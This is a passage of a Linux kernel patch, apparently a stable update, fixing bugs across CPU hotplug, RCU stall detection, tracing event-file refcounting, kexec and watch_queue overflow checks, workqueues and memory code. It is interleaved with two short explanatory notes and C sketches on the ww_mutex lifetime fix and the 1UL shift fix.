+-	if (cpu >= nr_cpu_ids)
+-		return -EBUSY;
+-	return work_on_cpu(cpu, __cpu_down_maps_locked, &work);
++	for_each_cpu_and(cpu, cpu_online_mask, housekeeping_cpumask(HK_TYPE_DOMAIN)) {
++		if (cpu != work.cpu)
++			return work_on_cpu(cpu, __cpu_down_maps_locked, &work);
++	}
++	return -EBUSY;
+ }
+ 
+ static int cpu_down(unsigned int cpu, enum cpuhp_state target)
+diff --git a/kernel/debug/debug_core.c b/kernel/debug/debug_core.c
+index d5e9ccde3ab8e..3a904d8697c8f 100644
+--- a/kernel/debug/debug_core.c
++++ b/kernel/debug/debug_core.c
+@@ -1006,6 +1006,9 @@ void kgdb_panic(const char *msg)
+ 	if (panic_timeout)
+ 		return;
+ 
++	debug_locks_off();
++	console_flush_on_panic(CONSOLE_FLUSH_PENDING);
++
+ 	if (dbg_kdb_mode)
+ 		kdb_printf("PANIC: %s\n", msg);
+ 
+diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c
+index 273a0fe7910a5..45965f13757e4 100644
+--- a/kernel/events/ring_buffer.c
++++ b/kernel/events/ring_buffer.c
+@@ -699,6 +699,12 @@ int rb_alloc_aux(struct perf_buffer *rb, struct perf_event *event,
+ 		watermark = 0;
+ 	}
+ 
++	/*
++	 * kcalloc_node() is unable to allocate a buffer if the size is larger
++	 * than PAGE_SIZE << MAX_ORDER; directly bail out in this case.
++	 */
++	if (get_order((unsigned long)nr_pages * sizeof(void *)) > MAX_ORDER)
++		return -ENOMEM;
+ 	rb->aux_pages = kcalloc_node(nr_pages, sizeof(void *), GFP_KERNEL,
+ 				     node);
+ 	if (!rb->aux_pages)
+diff --git a/kernel/irq/generic-chip.c b/kernel/irq/generic-chip.c
+index c653cd31548d0..5a452b94b6434 100644
+--- a/kernel/irq/generic-chip.c
++++ b/kernel/irq/generic-chip.c
+@@ -544,21 +544,34 @@ EXPORT_SYMBOL_GPL(irq_setup_alt_chip);
+ void irq_remove_generic_chip(struct irq_chip_generic *gc, u32 msk,
+ 			     unsigned int clr, unsigned int set)
+ {
+-	unsigned int i = gc->irq_base;
++	unsigned int i, virq;
+ 
+ 	raw_spin_lock(&gc_lock);
+ 	list_del(&gc->list);
+ 	raw_spin_unlock(&gc_lock);
+ 
+-	for (; msk; msk >>= 1, i++) {
++	for (i = 0; msk; msk >>= 1, i++) {
+ 		if (!(msk & 0x01))
+ 			continue;
+ 
++		/*
++		 * Interrupt domain based chips store the base hardware
++		 * interrupt number in gc::irq_base. Otherwise gc::irq_base
++		 * contains the base Linux interrupt number.
++		 */
++		if (gc->domain) {
++			virq = irq_find_mapping(gc->domain, gc->irq_base + i);
++			if (!virq)
++				continue;
++		} else {
++			virq = gc->irq_base + i;
++		}
++
+ 		/* Remove handler first. That will mask the irq line */
+-		irq_set_handler(i, NULL);
+-		irq_set_chip(i, &no_irq_chip);
+-		irq_set_chip_data(i, NULL);
+-		irq_modify_status(i, clr, set);
++		irq_set_handler(virq, NULL);
++		irq_set_chip(virq, &no_irq_chip);
++		irq_set_chip_data(virq, NULL);
++		irq_modify_status(virq, clr, set);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(irq_remove_generic_chip);
+diff --git a/kernel/kexec.c b/kernel/kexec.c
+index cb8e6e6f983c7..5ff1dcc4acb78 100644
+--- a/kernel/kexec.c
++++ b/kernel/kexec.c
+@@ -240,7 +240,7 @@ SYSCALL_DEFINE4(kexec_load, unsigned long, entry, unsigned long, nr_segments,
+ 		((flags & KEXEC_ARCH_MASK) != KEXEC_ARCH_DEFAULT))
+ 		return -EINVAL;
+ 
+-	ksegments = memdup_user(segments, nr_segments * sizeof(ksegments[0]));
++	ksegments = memdup_array_user(segments, nr_segments, sizeof(ksegments[0]));
+ 	if (IS_ERR(ksegments))
+ 		return PTR_ERR(ksegments);
+ 
+diff --git a/kernel/locking/test-ww_mutex.c b/kernel/locking/test-ww_mutex.c
+index 43efb2a041602..b1e25695185a4 100644
+--- a/kernel/locking/test-ww_mutex.c
++++ b/kernel/locking/test-ww_mutex.c
+@@ -466,7 +466,6 @@ retry:
+ 	} while (!time_after(jiffies, stress->timeout));
+ 
+ 	kfree(order);
+-	kfree(stress);
+ }
+ 
+ struct reorder_lock {
+@@ -531,7 +530,6 @@ out:
+ 	list_for_each_entry_safe(ll, ln, &locks, link)
+ 		kfree(ll);
+ 	kfree(order);
+-	kfree(stress);
+ }
+ 
+ static void stress_one_work(struct work_struct *work)
+@@ -552,8 +550,6 @@ static void stress_one_work(struct work_struct *work)
+ 			break;
+ 		}
+ 	} while (!time_after(jiffies, stress->timeout));
+-
+-	kfree(stress);
+ }
+ 
+ #define STRESS_INORDER BIT(0)
+@@ -564,15 +560,24 @@ static void stress_one_work(struct work_struct *work)
+ static int stress(int nlocks, int nthreads, unsigned int flags)
+ {
+ 	struct ww_mutex *locks;
+-	int n;
++	struct stress *stress_array;
++	int n, count;
+ 
+ 	locks = kmalloc_array(nlocks, sizeof(*locks), GFP_KERNEL);
+ 	if (!locks)
+ 		return -ENOMEM;
+ 
++	stress_array = kmalloc_array(nthreads, sizeof(*stress_array),
++				     GFP_KERNEL);
++	if (!stress_array) {
++		kfree(locks);
++		return -ENOMEM;
++	}
++
+ 	for (n = 0; n < nlocks; n++)
+ 		ww_mutex_init(&locks[n], &ww_class);
+ 
++	count = 0;
+ 	for (n = 0; nthreads; n++) {
+ 		struct stress *stress;
+ 		void (*fn)(struct work_struct *work);
+@@ -596,9 +601,7 @@ static int stress(int nlocks, int nthreads, unsigned int flags)
+ 		if (!fn)
+ 			continue;
+ 
+-		stress = kmalloc(sizeof(*stress), GFP_KERNEL);
+-		if (!stress)
+-			break;
++		stress = &stress_array[count++];
+ 
+ 		INIT_WORK(&stress->work, fn);
+ 		stress->locks = locks;
+@@ -613,6 +616,7 @@ static int stress(int nlocks, int nthreads, unsigned int flags)
+ 
+ 	for (n = 0; n < nlocks; n++)
+ 		ww_mutex_destroy(&locks[n]);
++	kfree(stress_array);
+ 	kfree(locks);
+ 
+ 	return 0;
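
The test-ww_mutex.c change replaces per-worker kmalloc()/kfree() of the stress context (which let a worker free memory that the flush/teardown path could still touch) with one array freed only after all work has completed. A pthread-based sketch of the corrected lifetime, with pthreads standing in for the workqueue:

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct stress { int id; };

static void *worker(void *arg)
{
	struct stress *s = arg;

	printf("worker %d running\n", s->id);
	return NULL;	/* no free(s) here: the array outlives the worker */
}

int main(void)
{
	enum { NTHREADS = 4 };
	struct stress *stress_array;
	pthread_t tid[NTHREADS];
	int n;

	stress_array = calloc(NTHREADS, sizeof(*stress_array));
	if (!stress_array)
		return 1;
	for (n = 0; n < NTHREADS; n++) {
		stress_array[n].id = n;
		pthread_create(&tid[n], NULL, worker, &stress_array[n]);
	}
	for (n = 0; n < NTHREADS; n++)
		pthread_join(tid[n], NULL);
	free(stress_array);	/* single free after all workers are done */
	return 0;
}
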
+diff --git a/kernel/padata.c b/kernel/padata.c
+index 791d9cb07a501..7bef7dae3db54 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -194,7 +194,7 @@ int padata_do_parallel(struct padata_shell *ps,
+ 		*cb_cpu = cpu;
+ 	}
+ 
+-	err =  -EBUSY;
++	err = -EBUSY;
+ 	if ((pinst->flags & PADATA_RESET))
+ 		goto out;
+ 
+diff --git a/kernel/power/snapshot.c b/kernel/power/snapshot.c
+index c20ca5fb9adc8..03c4ca4048e3e 100644
+--- a/kernel/power/snapshot.c
++++ b/kernel/power/snapshot.c
+@@ -2418,8 +2418,9 @@ static void *get_highmem_page_buffer(struct page *page,
+ 		pbe->copy_page = tmp;
+ 	} else {
+ 		/* Copy of the page will be stored in normal memory */
+-		kaddr = safe_pages_list;
+-		safe_pages_list = safe_pages_list->next;
++		kaddr = __get_safe_page(ca->gfp_mask);
++		if (!kaddr)
++			return ERR_PTR(-ENOMEM);
+ 		pbe->copy_page = virt_to_page(kaddr);
+ 	}
+ 	pbe->next = highmem_pblist;
+@@ -2599,8 +2600,9 @@ static void *get_buffer(struct memory_bitmap *bm, struct chain_allocator *ca)
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+ 	pbe->orig_address = page_address(page);
+-	pbe->address = safe_pages_list;
+-	safe_pages_list = safe_pages_list->next;
++	pbe->address = __get_safe_page(ca->gfp_mask);
++	if (!pbe->address)
++		return ERR_PTR(-ENOMEM);
+ 	pbe->next = restore_pblist;
+ 	restore_pblist = pbe;
+ 	return pbe->address;
+@@ -2631,8 +2633,6 @@ int snapshot_write_next(struct snapshot_handle *handle)
+ 	if (handle->cur > 1 && handle->cur > nr_meta_pages + nr_copy_pages)
+ 		return 0;
+ 
+-	handle->sync_read = 1;
+-
+ 	if (!handle->cur) {
+ 		if (!buffer)
+ 			/* This makes the buffer be freed by swsusp_free() */
+@@ -2668,7 +2668,6 @@ int snapshot_write_next(struct snapshot_handle *handle)
+ 			memory_bm_position_reset(&orig_bm);
+ 			restore_pblist = NULL;
+ 			handle->buffer = get_buffer(&orig_bm, &ca);
+-			handle->sync_read = 0;
+ 			if (IS_ERR(handle->buffer))
+ 				return PTR_ERR(handle->buffer);
+ 		}
+@@ -2678,9 +2677,8 @@ int snapshot_write_next(struct snapshot_handle *handle)
+ 		handle->buffer = get_buffer(&orig_bm, &ca);
+ 		if (IS_ERR(handle->buffer))
+ 			return PTR_ERR(handle->buffer);
+-		if (handle->buffer != buffer)
+-			handle->sync_read = 0;
+ 	}
++	handle->sync_read = (handle->buffer == buffer);
+ 	handle->cur++;
+ 	return PAGE_SIZE;
+ }
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 4db36d543be37..8fdf076720384 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -223,7 +223,7 @@ static bool init_srcu_struct_nodes(struct srcu_struct *ssp, gfp_t gfp_flags)
+ 				snp->grplo = cpu;
+ 			snp->grphi = cpu;
+ 		}
+-		sdp->grpmask = 1 << (cpu - sdp->mynode->grplo);
++		sdp->grpmask = 1UL << (cpu - sdp->mynode->grplo);
+ 	}
+ 	smp_store_release(&ssp->srcu_size_state, SRCU_SIZE_WAIT_BARRIER);
+ 	return true;
+@@ -722,7 +722,7 @@ static void srcu_schedule_cbs_snp(struct srcu_struct *ssp, struct srcu_node *snp
+ 	int cpu;
+ 
+ 	for (cpu = snp->grplo; cpu <= snp->grphi; cpu++) {
+-		if (!(mask & (1 << (cpu - snp->grplo))))
++		if (!(mask & (1UL << (cpu - snp->grplo))))
+ 			continue;
+ 		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, cpu), delay);
+ 	}
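
The srcutree.c fix switches 1 << n to 1UL << n: with group offsets of 32 or more CPUs, the shift was evaluated in 32-bit int and overflowed (undefined behaviour). A sketch, assuming an LP64 target where unsigned long is 64 bits:

#include <stdio.h>

int main(void)
{
	int n = 40;	/* e.g. cpu - grplo on a large machine */

	/* (1 << n) with n >= 31 is undefined in 32-bit int;
	 * (1UL << n) is well-defined for n < 64 on LP64. */
	unsigned long good = 1UL << n;

	printf("1UL << %d = %#lx\n", n, good);
	return 0;
}
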
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 917a1e43f7839..15df37bc052a9 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -31,6 +31,7 @@
+ #include <linux/bitops.h>
+ #include <linux/export.h>
+ #include <linux/completion.h>
++#include <linux/kmemleak.h>
+ #include <linux/moduleparam.h>
+ #include <linux/panic.h>
+ #include <linux/panic_notifier.h>
+@@ -1604,10 +1605,22 @@ static bool rcu_gp_fqs_check_wake(int *gfp)
+  */
+ static void rcu_gp_fqs(bool first_time)
+ {
++	int nr_fqs = READ_ONCE(rcu_state.nr_fqs_jiffies_stall);
+ 	struct rcu_node *rnp = rcu_get_root();
+ 
+ 	WRITE_ONCE(rcu_state.gp_activity, jiffies);
+ 	WRITE_ONCE(rcu_state.n_force_qs, rcu_state.n_force_qs + 1);
++
++	WARN_ON_ONCE(nr_fqs > 3);
++	/* Only count down nr_fqs for stall purposes if jiffies moves. */
++	if (nr_fqs) {
++		if (nr_fqs == 1) {
++			WRITE_ONCE(rcu_state.jiffies_stall,
++				   jiffies + rcu_jiffies_till_stall_check());
++		}
++		WRITE_ONCE(rcu_state.nr_fqs_jiffies_stall, --nr_fqs);
++	}
++
+ 	if (first_time) {
+ 		/* Collect dyntick-idle snapshots. */
+ 		force_qs_rnp(dyntick_save_progress_counter);
+@@ -3369,6 +3382,14 @@ void kvfree_call_rcu(struct rcu_head *head, rcu_callback_t func)
+ 
+ 	WRITE_ONCE(krcp->count, krcp->count + 1);
+ 
++	/*
++	 * The kvfree_rcu() caller considers the pointer freed at this point
++	 * and likely removes any references to it. Since the actual slab
++	 * freeing (and kmemleak_free()) is deferred, tell kmemleak to ignore
++	 * this object (no scanning or false positives reporting).
++	 */
++	kmemleak_ignore(ptr);
++
+ 	// Set timer to drain after KFREE_DRAIN_JIFFIES.
+ 	if (rcu_scheduler_active == RCU_SCHEDULER_RUNNING)
+ 		schedule_delayed_monitor_work(krcp);
+diff --git a/kernel/rcu/tree.h b/kernel/rcu/tree.h
+index d4a97e40ea9c3..7b702220d81cb 100644
+--- a/kernel/rcu/tree.h
++++ b/kernel/rcu/tree.h
+@@ -365,6 +365,10 @@ struct rcu_state {
+ 						/*  in jiffies. */
+ 	unsigned long jiffies_stall;		/* Time at which to check */
+ 						/*  for CPU stalls. */
++	int nr_fqs_jiffies_stall;		/* Number of fqs loops after
++						 * which to read jiffies and
++						 * set jiffies_stall. Stall
++						 * warnings disabled if !0. */
+ 	unsigned long jiffies_resched;		/* Time at which to resched */
+ 						/*  a reluctant CPU. */
+ 	unsigned long n_force_qs_gpstart;	/* Snapshot of n_force_qs at */
+diff --git a/kernel/rcu/tree_stall.h b/kernel/rcu/tree_stall.h
+index 5653560573e22..7d15b5b5a235a 100644
+--- a/kernel/rcu/tree_stall.h
++++ b/kernel/rcu/tree_stall.h
+@@ -149,12 +149,17 @@ static void panic_on_rcu_stall(void)
+ /**
+  * rcu_cpu_stall_reset - restart stall-warning timeout for current grace period
+  *
++ * To perform the reset request from the caller, disable stall detection until
++ * 3 fqs loops have passed. This is required to ensure a fresh jiffies value
++ * is loaded. It should be safe to do from the fqs loop as enough timer
++ * interrupts and context switches should have passed.
++ *
+  * The caller must disable hard irqs.
+  */
+ void rcu_cpu_stall_reset(void)
+ {
+-	WRITE_ONCE(rcu_state.jiffies_stall,
+-		   jiffies + rcu_jiffies_till_stall_check());
++	WRITE_ONCE(rcu_state.nr_fqs_jiffies_stall, 3);
++	WRITE_ONCE(rcu_state.jiffies_stall, ULONG_MAX);
+ }
+ 
+ //////////////////////////////////////////////////////////////////////////////
+@@ -170,6 +175,7 @@ static void record_gp_stall_check_time(void)
+ 	WRITE_ONCE(rcu_state.gp_start, j);
+ 	j1 = rcu_jiffies_till_stall_check();
+ 	smp_mb(); // ->gp_start before ->jiffies_stall and caller's ->gp_seq.
++	WRITE_ONCE(rcu_state.nr_fqs_jiffies_stall, 0);
+ 	WRITE_ONCE(rcu_state.jiffies_stall, j + j1);
+ 	rcu_state.jiffies_resched = j + j1 / 2;
+ 	rcu_state.n_force_qs_gpstart = READ_ONCE(rcu_state.n_force_qs);
+@@ -694,6 +700,16 @@ static void check_cpu_stall(struct rcu_data *rdp)
+ 	    !rcu_gp_in_progress())
+ 		return;
+ 	rcu_stall_kick_kthreads();
++
++	/*
++	 * Check if it was requested (via rcu_cpu_stall_reset()) that the FQS
++	 * loop has to set jiffies to ensure a non-stale jiffies value. This
++	 * is required to have a good jiffies value after coming out of long
++	 * gaps in jiffies updates. Not doing so can cause false positives.
++	 */
++	if (READ_ONCE(rcu_state.nr_fqs_jiffies_stall) > 0)
++		return;
++
+ 	j = jiffies;
+ 
+ 	/*
+diff --git a/kernel/reboot.c b/kernel/reboot.c
+index 3bba88c7ffc6b..6ebef11c88760 100644
+--- a/kernel/reboot.c
++++ b/kernel/reboot.c
+@@ -74,6 +74,7 @@ void __weak (*pm_power_off)(void);
+ void emergency_restart(void)
+ {
+ 	kmsg_dump(KMSG_DUMP_EMERG);
++	system_state = SYSTEM_RESTART;
+ 	machine_emergency_restart();
+ }
+ EXPORT_SYMBOL_GPL(emergency_restart);
+diff --git a/kernel/smp.c b/kernel/smp.c
+index 06a413987a14a..63e466bb6b03a 100644
+--- a/kernel/smp.c
++++ b/kernel/smp.c
+@@ -185,6 +185,8 @@ static DEFINE_PER_CPU(struct cfd_seq_local, cfd_seq_local);
+ 
+ static ulong csd_lock_timeout = 5000;  /* CSD lock timeout in milliseconds. */
+ module_param(csd_lock_timeout, ulong, 0444);
++static int panic_on_ipistall;  /* CSD panic timeout in milliseconds, 300000 for five minutes. */
++module_param(panic_on_ipistall, int, 0444);
+ 
+ static atomic_t csd_bug_count = ATOMIC_INIT(0);
+ static u64 cfd_seq;
+@@ -343,6 +345,7 @@ static bool csd_lock_wait_toolong(struct __call_single_data *csd, u64 ts0, u64 *
+ 	}
+ 
+ 	ts2 = sched_clock();
++	/* How long since we last checked for a stuck CSD lock. */
+ 	ts_delta = ts2 - *ts1;
+ 	if (likely(ts_delta <= csd_lock_timeout_ns || csd_lock_timeout_ns == 0))
+ 		return false;
+@@ -356,9 +359,17 @@ static bool csd_lock_wait_toolong(struct __call_single_data *csd, u64 ts0, u64 *
+ 	else
+ 		cpux = cpu;
+ 	cpu_cur_csd = smp_load_acquire(&per_cpu(cur_csd, cpux)); /* Before func and info. */
++	/* How long since this CSD lock was stuck. */
++	ts_delta = ts2 - ts0;
+ 	pr_alert("csd: %s non-responsive CSD lock (#%d) on CPU#%d, waiting %llu ns for CPU#%02d %pS(%ps).\n",
+-		 firsttime ? "Detected" : "Continued", *bug_id, raw_smp_processor_id(), ts2 - ts0,
++		 firsttime ? "Detected" : "Continued", *bug_id, raw_smp_processor_id(), ts_delta,
+ 		 cpu, csd->func, csd->info);
++	/*
++	 * If the CSD lock is still stuck after 5 minutes, it is unlikely
++	 * to become unstuck. Use a signed comparison to avoid triggering
++	 * on underflows when the TSC is out of sync between sockets.
++	 */
++	BUG_ON(panic_on_ipistall > 0 && (s64)ts_delta > ((s64)panic_on_ipistall * NSEC_PER_MSEC));
+ 	if (cpu_cur_csd && csd != cpu_cur_csd) {
+ 		pr_alert("\tcsd: CSD lock (#%d) handling prior %pS(%ps) request.\n",
+ 			 *bug_id, READ_ONCE(per_cpu(cur_csd_func, cpux)),
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 9db92a6e14636..ddcfc78e93e00 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4912,6 +4912,20 @@ int tracing_open_file_tr(struct inode *inode, struct file *filp)
+ 	if (ret)
+ 		return ret;
+ 
++	mutex_lock(&event_mutex);
++
++	/* Fail if the file is marked for removal */
++	if (file->flags & EVENT_FILE_FL_FREED) {
++		trace_array_put(file->tr);
++		ret = -ENODEV;
++	} else {
++		event_file_get(file);
++	}
++
++	mutex_unlock(&event_mutex);
++	if (ret)
++		return ret;
++
+ 	filp->private_data = inode->i_private;
+ 
+ 	return 0;
+@@ -4922,6 +4936,7 @@ int tracing_release_file_tr(struct inode *inode, struct file *filp)
+ 	struct trace_event_file *file = inode->i_private;
+ 
+ 	trace_array_put(file->tr);
++	event_file_put(file);
+ 
+ 	return 0;
+ }
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 7e6d5101bdb05..10aaafa2936dc 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -1631,6 +1631,9 @@ extern void event_trigger_unregister(struct event_command *cmd_ops,
+ 				     char *glob,
+ 				     struct event_trigger_data *trigger_data);
+ 
++extern void event_file_get(struct trace_event_file *file);
++extern void event_file_put(struct trace_event_file *file);
++
+ /**
+  * struct event_trigger_ops - callbacks for trace event triggers
+  *
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 2e3dce5e2575e..a6d2f99f847d3 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -988,26 +988,38 @@ static void remove_subsystem(struct trace_subsystem_dir *dir)
+ 	}
+ }
+ 
+-static void remove_event_file_dir(struct trace_event_file *file)
++void event_file_get(struct trace_event_file *file)
+ {
+-	struct dentry *dir = file->dir;
+-	struct dentry *child;
++	atomic_inc(&file->ref);
++}
+ 
+-	if (dir) {
+-		spin_lock(&dir->d_lock);	/* probably unneeded */
+-		list_for_each_entry(child, &dir->d_subdirs, d_child) {
+-			if (d_really_is_positive(child))	/* probably unneeded */
+-				d_inode(child)->i_private = NULL;
+-		}
+-		spin_unlock(&dir->d_lock);
++void event_file_put(struct trace_event_file *file)
++{
++	if (WARN_ON_ONCE(!atomic_read(&file->ref))) {
++		if (file->flags & EVENT_FILE_FL_FREED)
++			kmem_cache_free(file_cachep, file);
++		return;
++	}
+ 
+-		tracefs_remove(dir);
++	if (atomic_dec_and_test(&file->ref)) {
++		/* Count should only go to zero when it is freed */
++		if (WARN_ON_ONCE(!(file->flags & EVENT_FILE_FL_FREED)))
++			return;
++		kmem_cache_free(file_cachep, file);
+ 	}
++}
++
++static void remove_event_file_dir(struct trace_event_file *file)
++{
++	struct dentry *dir = file->dir;
++
++	tracefs_remove(dir);
+ 
+ 	list_del(&file->list);
+ 	remove_subsystem(file->system);
+ 	free_event_filter(file->filter);
+-	kmem_cache_free(file_cachep, file);
++	file->flags |= EVENT_FILE_FL_FREED;
++	event_file_put(file);
+ }
+ 
+ /*
+@@ -1380,7 +1392,7 @@ event_enable_read(struct file *filp, char __user *ubuf, size_t cnt,
+ 		flags = file->flags;
+ 	mutex_unlock(&event_mutex);
+ 
+-	if (!file)
++	if (!file || flags & EVENT_FILE_FL_FREED)
+ 		return -ENODEV;
+ 
+ 	if (flags & EVENT_FILE_FL_ENABLED &&
+@@ -1418,7 +1430,7 @@ event_enable_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 		ret = -ENODEV;
+ 		mutex_lock(&event_mutex);
+ 		file = event_file_data(filp);
+-		if (likely(file))
++		if (likely(file && !(file->flags & EVENT_FILE_FL_FREED)))
+ 			ret = ftrace_event_enable_disable(file, val);
+ 		mutex_unlock(&event_mutex);
+ 		break;
+@@ -1692,7 +1704,7 @@ event_filter_read(struct file *filp, char __user *ubuf, size_t cnt,
+ 
+ 	mutex_lock(&event_mutex);
+ 	file = event_file_data(filp);
+-	if (file)
++	if (file && !(file->flags & EVENT_FILE_FL_FREED))
+ 		print_event_filter(file, s);
+ 	mutex_unlock(&event_mutex);
+ 
+@@ -2810,6 +2822,7 @@ trace_create_new_event(struct trace_event_call *call,
+ 	atomic_set(&file->tm_ref, 0);
+ 	INIT_LIST_HEAD(&file->triggers);
+ 	list_add(&file->list, &tr->events);
++	event_file_get(file);
+ 
+ 	return file;
+ }
+diff --git a/kernel/trace/trace_events_filter.c b/kernel/trace/trace_events_filter.c
+index 96acc2b71ac74..86a0531efd43d 100644
+--- a/kernel/trace/trace_events_filter.c
++++ b/kernel/trace/trace_events_filter.c
+@@ -1997,6 +1997,9 @@ int apply_event_filter(struct trace_event_file *file, char *filter_string)
+ 	struct event_filter *filter = NULL;
+ 	int err;
+ 
++	if (file->flags & EVENT_FILE_FL_FREED)
++		return -ENODEV;
++
+ 	if (!strcmp(strstrip(filter_string), "0")) {
+ 		filter_disable(file);
+ 		filter = event_filter(file);
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index b0d3876c96ab2..94a2e9d21f582 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -473,7 +473,7 @@ static unsigned int trace_string(struct synth_trace_event *entry,
+ 
+ #ifdef CONFIG_ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 		if ((unsigned long)str_val < TASK_SIZE)
+-			ret = strncpy_from_user_nofault(str_field, str_val, STR_VAR_LEN_MAX);
++			ret = strncpy_from_user_nofault(str_field, (const void __user *)str_val, STR_VAR_LEN_MAX);
+ 		else
+ #endif
+ 			ret = strncpy_from_kernel_nofault(str_field, str_val, STR_VAR_LEN_MAX);
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index 28ed71d277bd7..442bb92212f2a 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -332,7 +332,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,
+ 	    filter.__reserved != 0)
+ 		return -EINVAL;
+ 
+-	tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
++	tf = memdup_array_user(_filter->filters, filter.nr_filters, sizeof(*tf));
+ 	if (IS_ERR(tf))
+ 		return PTR_ERR(tf);
+ 
+diff --git a/kernel/watchdog.c b/kernel/watchdog.c
+index 8e61f21e7e33e..45693fb3e08de 100644
+--- a/kernel/watchdog.c
++++ b/kernel/watchdog.c
+@@ -183,6 +183,13 @@ static DEFINE_PER_CPU(unsigned long, hrtimer_interrupts);
+ static DEFINE_PER_CPU(unsigned long, hrtimer_interrupts_saved);
+ static unsigned long soft_lockup_nmi_warn;
+ 
++static int __init softlockup_panic_setup(char *str)
++{
++	softlockup_panic = simple_strtoul(str, NULL, 0);
++	return 1;
++}
++__setup("softlockup_panic=", softlockup_panic_setup);
++
+ static int __init nowatchdog_setup(char *str)
+ {
+ 	watchdog_user_enabled = 0;
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index bc1a97ee40b21..f3b6ac232e219 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -5185,50 +5185,54 @@ static void work_for_cpu_fn(struct work_struct *work)
+ }
+ 
+ /**
+- * work_on_cpu - run a function in thread context on a particular cpu
++ * work_on_cpu_key - run a function in thread context on a particular cpu
+  * @cpu: the cpu to run on
+  * @fn: the function to run
+  * @arg: the function arg
++ * @key: The lock class key for lock debugging purposes
+  *
+  * It is up to the caller to ensure that the cpu doesn't go offline.
+  * The caller must not hold any locks which would prevent @fn from completing.
+  *
+  * Return: The value @fn returns.
+  */
+-long work_on_cpu(int cpu, long (*fn)(void *), void *arg)
++long work_on_cpu_key(int cpu, long (*fn)(void *),
++		     void *arg, struct lock_class_key *key)
+ {
+ 	struct work_for_cpu wfc = { .fn = fn, .arg = arg };
+ 
+-	INIT_WORK_ONSTACK(&wfc.work, work_for_cpu_fn);
++	INIT_WORK_ONSTACK_KEY(&wfc.work, work_for_cpu_fn, key);
+ 	schedule_work_on(cpu, &wfc.work);
+ 	flush_work(&wfc.work);
+ 	destroy_work_on_stack(&wfc.work);
+ 	return wfc.ret;
+ }
+-EXPORT_SYMBOL_GPL(work_on_cpu);
++EXPORT_SYMBOL_GPL(work_on_cpu_key);
+ 
+ /**
+- * work_on_cpu_safe - run a function in thread context on a particular cpu
++ * work_on_cpu_safe_key - run a function in thread context on a particular cpu
+  * @cpu: the cpu to run on
+  * @fn:  the function to run
+  * @arg: the function argument
++ * @key: The lock class key for lock debugging purposes
+  *
+  * Disables CPU hotplug and calls work_on_cpu(). The caller must not hold
+  * any locks which would prevent @fn from completing.
+  *
+  * Return: The value @fn returns.
+  */
+-long work_on_cpu_safe(int cpu, long (*fn)(void *), void *arg)
++long work_on_cpu_safe_key(int cpu, long (*fn)(void *),
++			  void *arg, struct lock_class_key *key)
+ {
+ 	long ret = -ENODEV;
+ 
+ 	cpus_read_lock();
+ 	if (cpu_online(cpu))
+-		ret = work_on_cpu(cpu, fn, arg);
++		ret = work_on_cpu_key(cpu, fn, arg, key);
+ 	cpus_read_unlock();
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(work_on_cpu_safe);
++EXPORT_SYMBOL_GPL(work_on_cpu_safe_key);
+ #endif /* CONFIG_SMP */
+ 
+ #ifdef CONFIG_FREEZER
+diff --git a/lib/generic-radix-tree.c b/lib/generic-radix-tree.c
+index f25eb111c0516..7dfa88282b006 100644
+--- a/lib/generic-radix-tree.c
++++ b/lib/generic-radix-tree.c
+@@ -166,6 +166,10 @@ void *__genradix_iter_peek(struct genradix_iter *iter,
+ 	struct genradix_root *r;
+ 	struct genradix_node *n;
+ 	unsigned level, i;
++
++	if (iter->offset == SIZE_MAX)
++		return NULL;
++
+ restart:
+ 	r = READ_ONCE(radix->root);
+ 	if (!r)
+@@ -184,10 +188,17 @@ restart:
+ 			(GENRADIX_ARY - 1);
+ 
+ 		while (!n->children[i]) {
++			size_t objs_per_ptr = genradix_depth_size(level);
++
++			if (iter->offset + objs_per_ptr < iter->offset) {
++				iter->offset	= SIZE_MAX;
++				iter->pos	= SIZE_MAX;
++				return NULL;
++			}
++
+ 			i++;
+-			iter->offset = round_down(iter->offset +
+-					   genradix_depth_size(level),
+-					   genradix_depth_size(level));
++			iter->offset = round_down(iter->offset + objs_per_ptr,
++						  objs_per_ptr);
+ 			iter->pos = (iter->offset >> PAGE_SHIFT) *
+ 				objs_per_page;
+ 			if (i == GENRADIX_ARY)
+diff --git a/mm/cma.c b/mm/cma.c
+index 4a978e09547a8..30b6ca30009bb 100644
+--- a/mm/cma.c
++++ b/mm/cma.c
+@@ -500,7 +500,7 @@ struct page *cma_alloc(struct cma *cma, unsigned long count,
+ 	 */
+ 	if (page) {
+ 		for (i = 0; i < count; i++)
+-			page_kasan_tag_reset(page + i);
++			page_kasan_tag_reset(nth_page(page, i));
+ 	}
+ 
+ 	if (ret && !no_warn) {
+diff --git a/mm/damon/lru_sort.c b/mm/damon/lru_sort.c
+index efbc2bda8b9cd..63bdad20dbaf8 100644
+--- a/mm/damon/lru_sort.c
